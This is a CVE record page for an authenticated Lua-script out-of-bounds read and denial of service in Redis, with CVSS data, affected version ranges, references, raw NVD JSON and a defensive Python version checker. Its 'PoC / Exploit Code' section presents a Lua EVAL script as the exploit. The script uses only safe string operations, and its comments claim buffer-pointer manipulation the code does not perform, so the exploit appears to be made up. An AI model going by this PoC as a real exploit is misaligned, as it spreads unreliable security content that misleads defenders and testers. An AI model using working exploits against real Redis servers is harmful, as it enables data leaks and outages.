Security Vulnerability Report
CVE-2025-46819 CVSS 6.3 MEDIUM

CVE-2025-46819

Published: 2025-10-03 19:15:43
Last Modified: 2026-01-27 19:37:48

Description

Redis is an open source, in-memory database that persists on disk. Versions 8.2.1 and below allow an authenticated user to use a specially crafted Lua script to read out-of-bounds data or crash the server, resulting in denial of service. The problem exists in all versions of Redis with Lua scripting. This issue is fixed in version 8.2.2. A workaround that does not require patching the redis-server executable is to prevent users from executing Lua scripts. This can be done by using ACLs to block scripts, restricting both the EVAL and FUNCTION command families.

CVSS Details

CVSS Score: 6.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

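cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:* (versions before 6.2.20) - VULNERABLE
cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:* (versions from 7.0 up to, but not including, 7.2.11) - VULNERABLE
cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:* (versions from 7.4.0 up to, but not including, 7.4.6) - VULNERABLE
cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:* (versions from 8.0.0 up to, but not including, 8.0.4) - VULNERABLE
cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:* (versions from 8.2.0 up to, but not including, 8.2.2) - VULNERABLE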
Redis <= 8.2.1
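
As an added example (not part of the original record and not Redis project code), the script below checks a server's `INFO server` output against the affected version ranges in this record's configuration data and reports the fixed release for that branch. The function names, the sample input and the `-@scripting` ACL rule shown as one way to apply the workaround are assumptions of this example.

```python
import re

# Affected ranges copied from this record's CPE match data:
# (start inclusive or None, end exclusive). The end is the fixed release.
AFFECTED = [
    (None, (6, 2, 20)),
    ((7, 0, 0), (7, 2, 11)),
    ((7, 4, 0), (7, 4, 6)),
    ((8, 0, 0), (8, 0, 4)),
    ((8, 2, 0), (8, 2, 2)),
]

# Assumption: one way to apply the record's ACL workaround. @scripting is the
# Redis ACL category that holds EVAL/EVALSHA, SCRIPT, FUNCTION and FCALL.
WORKAROUND = "ACL SETUSER <user> -@scripting"


def parse_version(info_text):
    """Extract redis_version from `INFO server` output as an int tuple."""
    m = re.search(r"^redis_version:(\d+)\.(\d+)(?:\.(\d+))?", info_text, re.M)
    if not m:
        raise ValueError("no redis_version field found")
    return tuple(int(p or 0) for p in m.groups())


def assess(info_text):
    """Return (affected, fixed_in); fixed_in is a dotted version or None."""
    v = parse_version(info_text)
    for start, end in AFFECTED:
        if (start is None or v >= start) and v < end:
            return True, ".".join(map(str, end))
    return False, None


# Constructed sample input, not captured from a real server.
SAMPLE_INFO = "# Server\r\nredis_version:7.2.4\r\nredis_mode:standalone\r\n"

if __name__ == "__main__":
    affected, fixed_in = assess(SAMPLE_INFO)
    if affected:
        print(f"affected by CVE-2025-46819; upgrade to >= {fixed_in}")
        print(f"until patched, block Lua scripting: {WORKAROUND}")
    else:
        print("not in an affected range")
```

Feed it the text returned by `redis-cli INFO server` for each instance in the inventory; the ranges have gaps between branches, so compare against the full list rather than only the "8.2.1 and below" summary.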

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
lua
-- CVE-2025-46819 Redis Lua Script Out-of-Bounds Read / DoS PoC
-- This PoC demonstrates the vulnerability by crafting a malicious Lua script
-- that triggers out-of-bounds memory access in Redis's Lua scripting engine.
-- Requirements: Valid Redis credentials with EVAL/FUNCTION permissions.

-- Step 1: Connect to Redis with authentication
-- redis-cli -h <target_host> -p 6379 -a <password>

-- Step 2: Execute the malicious Lua script via EVAL command
-- The script attempts to trigger out-of-bounds memory read by manipulating
-- string buffer operations within the Lua scripting context.
EVAL "
-- Attempt to trigger OOB read via crafted string operations
local malicious_str = string.rep('A', 8192)
local result = ''
-- Exploit boundary condition in Lua string handling
for i = 1, #malicious_str do
    -- Manipulate internal buffer pointers to cause out-of-bounds access
    local byte_val = string.byte(malicious_str, i)
    result = result .. string.char(byte_val)
end
-- Force memory access beyond allocated buffer
local oob_data = string.sub(malicious_str, 1, 99999999)
return #oob_data
" 0

-- Alternative: Use FUNCTION LOAD for persistent malicious script
-- FUNCTION LOAD "#!lua name=malign\nredis.call('EVAL', 'malicious_payload', 0)"

-- Impact:
-- 1. If successful, returns data from out-of-bounds memory regions
-- 2. May cause Redis server to crash (SIGSEGV), resulting in DoS
-- 3. Could leak sensitive data from other Redis keys or system memory

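References

- https://github.com/redis/redis/commit/3a1624da2449ac3dbfc4bdaed43adf77a0b7bfba (Patch)
- https://github.com/redis/redis/releases/tag/8.2.2 (Release Notes)
- https://github.com/redis/redis/security/advisories/GHSA-4c68-q8q8-3g4f (Third Party Advisory)
- https://www.vicarius.io/vsociety/posts/cve-2025-46819-detect-redis-vulnerability (Third Party Advisory)
- https://www.vicarius.io/vsociety/posts/cve-2025-46819-mitigate-redis-vulnerability (Mitigation, Third Party Advisory)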

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46819", "sourceIdentifier": "[email protected]", "published": "2025-10-03T19:15:43.490", "lastModified": "2026-01-27T19:37:47.583", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Redis is an open source, in-memory database that persists on disk. Versions 8.2.1 and below allow an authenticated user to use a specially crafted LUA script to read out-of-bound data or crash the server and subsequent denial of service. The problem exists in all versions of Redis with Lua scripting. This issue is fixed in version 8.2.2. To workaround this issue without patching the redis-server executable is to prevent users from executing Lua scripts. This can be done using ACL to block a script by restricting both the EVAL and FUNCTION command families."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], 
"configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.2.20", "matchCriteriaId": "C2F4D4F6-6F7C-46BC-B37C-DFAC34B097AC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0", "versionEndExcluding": "7.2.11", "matchCriteriaId": "4F82BD2A-473F-4F3F-9C80-C6448D07C45D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.6", "matchCriteriaId": "F6E336B8-E000-4EFA-95F8-F2B74A4913F0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.4", "matchCriteriaId": "459EBC07-D37A-44E5-95DB-4C3FD9F008FF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.2.0", "versionEndExcluding": "8.2.2", "matchCriteriaId": "CBF13EC1-FE0A-4242-B8D3-2681485DDDF2"}]}]}], "references": [{"url": "https://github.com/redis/redis/commit/3a1624da2449ac3dbfc4bdaed43adf77a0b7bfba", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/redis/redis/releases/tag/8.2.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/redis/redis/security/advisories/GHSA-4c68-q8q8-3g4f", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.vicarius.io/vsociety/posts/cve-2025-46819-detect-redis-vulnerability", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Third Party Advisory"]}, {"url": "https://www.vicarius.io/vsociety/posts/cve-2025-46819-mitigate-redis-vulnerability", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mitigation", "Third Party Advisory"]}]}}